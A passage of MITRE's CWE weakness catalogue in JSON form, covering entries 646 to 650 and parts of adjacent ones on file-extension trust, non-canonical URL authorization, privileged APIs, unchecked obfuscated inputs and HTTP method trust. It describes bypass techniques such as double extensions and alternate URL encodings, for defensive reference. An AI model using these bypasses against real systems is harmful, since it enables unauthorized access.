restrictive.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"Users could be locked out of accounts."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Implement more intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name."},{"Phase":"Architecture and Design","Description":"Implement a lockout timeout that grows as the number of incorrect login attempts goes up, eventually resulting in a complete lockout."},{"Phase":"Architecture and Design","Description":"Consider alternatives to account lockout that would still be effective against password brute force attacks, such as presenting the user machine with a puzzle to solve (makes it do some computation)."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder\'s account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"2"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Enabling_Factors_for_Exploitation, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"646":{"attr":{"@_ID":"646","@_Name":"Reliance on File Name or Extension of Externally-Supplied File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion.","Extended_Description":"An application might use the file name or extension of of a user-supplied file to determine the proper course of action, such as selecting the correct process to which control should be passed, deciding what data should be made available, or what resources should be allocated. If the attacker can cause the code to misclassify the supplied file, then the wrong action could occur. For example, an attacker could supply a file that ends in a \\".php.gif\\" extension that appears to be a GIF image, but would be processed as PHP code. In extreme cases, code execution is possible, but the attacker could also cause exhaustion of resources, denial of service, exposure of debug or system data (including application source code), or being bound to a particular server side process. This weakness may be due to a vulnerability in any of the technologies used by the web and application servers, due to misconfiguration, or resultant from another flaw in the application itself.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker may be able to read sensitive data."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"An attacker may be able to cause a denial of service."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker may be able to gain privileges."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Make decisions on the server side based on file content and not on file name or extension."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"209"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-13","Modification_Comment":"Significant clarification of the weakness description."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Taking Actions based on File Name or Extension of a User Supplied File","attr":{"@_Date":"2008-10-14"}}}},"647":{"attr":{"@_ID":"647","@_Name":"Use of Non-Canonical URL Paths for Authorization Decisions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines policy namespaces and makes authorization decisions based on the assumption that a URL is canonical. This can allow a non-canonical URL to bypass the authorization.","Extended_Description":{"xhtml:p":["If an application defines policy namespaces and makes authorization decisions based on the URL, but it does not require or convert to a canonical URL before making the authorization decision, then it opens the application to attack. For example, if the application only wants to allow access to http://www.example.com/mypage, then the attacker might be able to bypass this restriction using equivalent URLs such as:","Therefore it is important to specify access control policy that is based on the path information in some canonical form with all alternate encodings rejected (which can be accomplished by a default deny rule)."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["http://WWW.EXAMPLE.COM/mypage","http://www.example.com/%6Dypage (alternate encoding)","http://192.168.1.1/mypage (IP address)","http://www.example.com/mypage/ (trailing /)","http://www.example.com:80/mypage"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"An attacker may be able to bypass the authorization mechanism to gain access to the otherwise-protected URL."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"If a non-canonical URL is used, the server may choose to return the contents of the file, instead of pre-processing the file (e.g. as a program)."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Make access control policy based on path information in canonical form. Use very restrictive regular expressions to validate that the path is in the expected form."},{"Phase":"Architecture and Design","Description":"Reject all alternate path encodings that are not in the expected canonical form."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Example from CAPEC (CAPEC ID: 4, \\"Using Alternative IP Address Encodings\\"). An attacker identifies an application server that applies a security policy based on the domain and application name, so the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by putting in the IP address of the host the application authentication and authorization controls may be bypassed http://192.168.0.1:8080/application. The attacker relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS02-J","Entry_Name":"Canonicalize path names before validating them"}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Using Non-Canonical Paths for Authorization Decisions","attr":{"@_Date":"2008-10-14"}}}},"648":{"attr":{"@_ID":"648","@_Name":"Incorrect Use of Privileged APIs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application does not conform to the API requirements for a function call that requires extra privileges. This could allow attackers to gain privileges by causing the function to be called incorrectly.","Extended_Description":{"xhtml:p":["When an application contains certain functions that perform operations requiring an elevated level of privilege, the caller of a privileged API must be careful to:","If the caller of the API does not follow these requirements, then it may allow a malicious user or process to elevate their privilege, hijack the process, or steal sensitive data.","For instance, it is important to know if privileged APIs do not shed their privileges before returning to the caller or if the privileged function might make certain assumptions about the data, context or state information passed to it by the caller. It is important to always know when and how privileged APIs can be called in order to ensure that their elevated level of privilege cannot be exploited."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["ensure that assumptions made by the APIs are valid, such as validity of arguments","account for known weaknesses in the design/implementation of the API","call the API from a safe context"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker may be able to elevate privileges."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker may be able to obtain sensitive information."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"An attacker may be able to execute code."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Before calling privileged APIs, always ensure that the assumptions made by the privileged code hold true prior to making the call."},{"Phase":"Architecture and Design","Description":"Know architecture and implementation weaknesses of the privileged APIs and make sure to account for these weaknesses before calling the privileged APIs to ensure that they can be called safely."},{"Phase":"Implementation","Description":"If privileged APIs make certain assumptions about data, context or state validity that are passed by the caller, the calling code must ensure that these assumptions have been validated prior to making the call."},{"Phase":"Implementation","Description":"If privileged APIs do not shed their privilege prior to returning to the calling code, then calling code needs to shed these privileges immediately and safely right after the call to the privileged APIs. In particular, the calling code needs to ensure that a privileged thread of execution will never be returned to the user or made available to user-controlled processes."},{"Phase":"Implementation","Description":"Only call privileged APIs from safe, consistent and expected state."},{"Phase":"Implementation","Description":"Ensure that a failure or an error will not leave a system in a state where privileges are not properly shed and privilege escalation is possible (i.e. fail securely with regards to handling of privileges)."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-0645","Description":"A Unix utility that displays online help files, if installed setuid, could allow a local attacker to gain privileges when a particular file-opening function is called.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0645"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"107"}},{"attr":{"@_CAPEC_ID":"234"}}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Improper Use of Privileged APIs","attr":{"@_Date":"2009-05-27"}}}},"649":{"attr":{"@_ID":"649","@_Name":"Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the software does not use integrity checks to detect if those inputs have been modified.","Extended_Description":"When an application relies on obfuscation or incorrectly applied / weak encryption to protect client-controllable tokens or parameters, that may have an effect on the user state, system state, or some decision made on the server. Without protecting the tokens/parameters for integrity, the application is vulnerable to an attack where an adversary traverses the space of possible values of the said token/parameter in order to attempt to gain an advantage. The goal of the attacker is to find another admissible value that will somehow elevate their privileges in the system, disclose information or change the behavior of the system in some way beneficial to the attacker. If the application does not protect these critical tokens/parameters for integrity, it will not be able to determine that these values have been tampered with. Measures that are used to protect data for confidentiality should not be relied upon to provide the integrity service.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"The inputs could be modified without detection, causing the software to have unexpected system state or make incorrect security decisions."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect important client controllable tokens/parameters for integrity using PKI methods (i.e. digital signatures) or other means, and checks for integrity on the server side."},{"Phase":"Architecture and Design","Description":"Repeated requests from a particular user that include invalid values of tokens/parameters (those that should not be changed manually by users) should result in the user account lockout."},{"Phase":"Architecture and Design","Description":"Client side tokens/parameters should not be such that it would be easy/predictable to guess another valid state."},{"Phase":"Architecture and Design","Description":"Obfuscation should not be relied upon. If encryption is used, it needs to be properly applied (i.e. proven algorithm and implementation, use padding, use random initialization vector, user proper encryption mode). Even with proper encryption where the ciphertext does not leak information about the plaintext or reveal its structure, compromising integrity is possible (although less likely) without the provision of the integrity service."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-0039","Description":"An IPSec configuration does not perform integrity checking of the IPSec packet as the result of either not configuring ESP properly to support the integrity service or using AH improperly. In either case, the security gateway receiving the IPSec packet would not validate the integrity of the packet to ensure that it was not changed. Thus if the packets were intercepted the attacker could undetectably change some of the bits in the packets. The meaningful bit flipping was possible due to the known weaknesses in the CBC encryption mode. Since the attacker knew the structure of the packet, they were able (in one variation of the attack) to use bit flipping to change the destination IP of the packet to the destination machine controlled by the attacker. And so the destination security gateway would decrypt the packet and then forward the plaintext to the machine controlled by the attacker. The attacker could then read the original message. For instance if VPN was used with the vulnerable IPSec configuration the attacker could read the victim\'s e-mail. This vulnerability demonstrates the need to enforce the integrity service properly when critical data could be modified by an attacker. This problem might have also been mitigated by using an encryption mode that is not susceptible to bit flipping attacks, but the preferred mechanism to address this problem still remains message verification for integrity. While this attack focuses on the network layer and requires an entity that controls part of the communication path such as a router, the situation is not much different at the software level, where an attacker can modify tokens/parameters used by the application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0039"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"463"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Description, Enabling_Factors_for_Exploitation, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Relying on Obfuscation or Encryption with no Integrity Checking to Protect User Controllable Parameters that are Used to Determine User or System State","attr":{"@_Date":"2008-04-11"}}}},"650":{"attr":{"@_ID":"650","@_Name":"Trusting HTTP Permission Methods on the Server Side","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The server contains a protection mechanism that assumes that any URI that is accessed using HTTP GET will not cause a state change to the associated resource. This might allow attackers to bypass intended access restrictions and conduct resource modification and deletion attacks, since some applications allow GET to modify state.","Extended_Description":"The HTTP GET method and some other methods are designed to retrieve resources and not to alter the state of the application or resources on the server side. Furthermore, the HTTP specification requires that GET requests (and other requests) should not have side effects. Believing that it will be enough to prevent unintended resource alterations, an application may disallow the HTTP requests to perform DELETE, PUT and POST operations on the resource representation. However, there is nothing in the HTTP protocol itself that actually prevents the HTTP GET method from performing more than just query of the data. Developers can easily code programs that accept a HTTP GET request that do in fact create, update or delete data on the server. For instance, it is a common practice with REST based Web Services to have HTTP GET requests modifying resources on the server side. However, whenever that happens, the access control needs to be properly enforced in the application. No assumptions should be made that only HTTP DELETE, PUT, POST, and other methods have the power to alter the representation of the resource being accessed in the request.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could escalate privileges."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify resources."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker could obtain sensitive information."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Configure ACLs on the server side to ensure that proper level of access control is defined for each accessible resource representation."}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"651":{"attr":{"@_ID":"651","@_Name":"Exposure of WSDL File Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Web services architecture may require exposing a Web Service Definition Language (WSDL) file that contains information on the publicly accessible services and how callers of these services should interact with them (e.g. what parameters they expect and what types they return).","Extended_Description":{"xhtml:p":"An information exposure may occur if any of the following apply:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["The WSDL file is accessible to a wider audience than intended.","The WSDL file contains information on the methods/services that should not be publicly accessible or information about deprecated methods. This problem is made more likely due to the WSDL often being automatically generated from the code.","Information in the WSDL file helps guess names/locations of methods/resources that should not be publicly accessible."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"538","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The attacker may find sensitive information located in the WSDL file."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Limit access to the WSDL file as much as possible. If services are provided only to a limited number of entities, it may be better to provide WSDL privately to each of these entities than to publish WSDL publicly."},{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Make sure that WSDL does not describe methods that should not be publicly accessible. Make sure to protect service methods that should not be publicly accessible with access controls."},{"Phase":"Architecture and Design","Description":"Do not use method names in WSDL that might help an adversary guess names of private methods/resources used by the service."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The WSDL for a service providing information on the best price of a certain item exposes the following method: float getBestPrice(String ItemID) An attacker might guess that there is a method setBestPrice (String ItemID, float Price) that is available and invoke that method to try and change the best price of a given item to their advantage. The attack may succeed if the attacker correctly guesses the name of the method, the method does not have proper access controls around it and the service itself has the functionality to update the best price of the item."}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak through WSDL 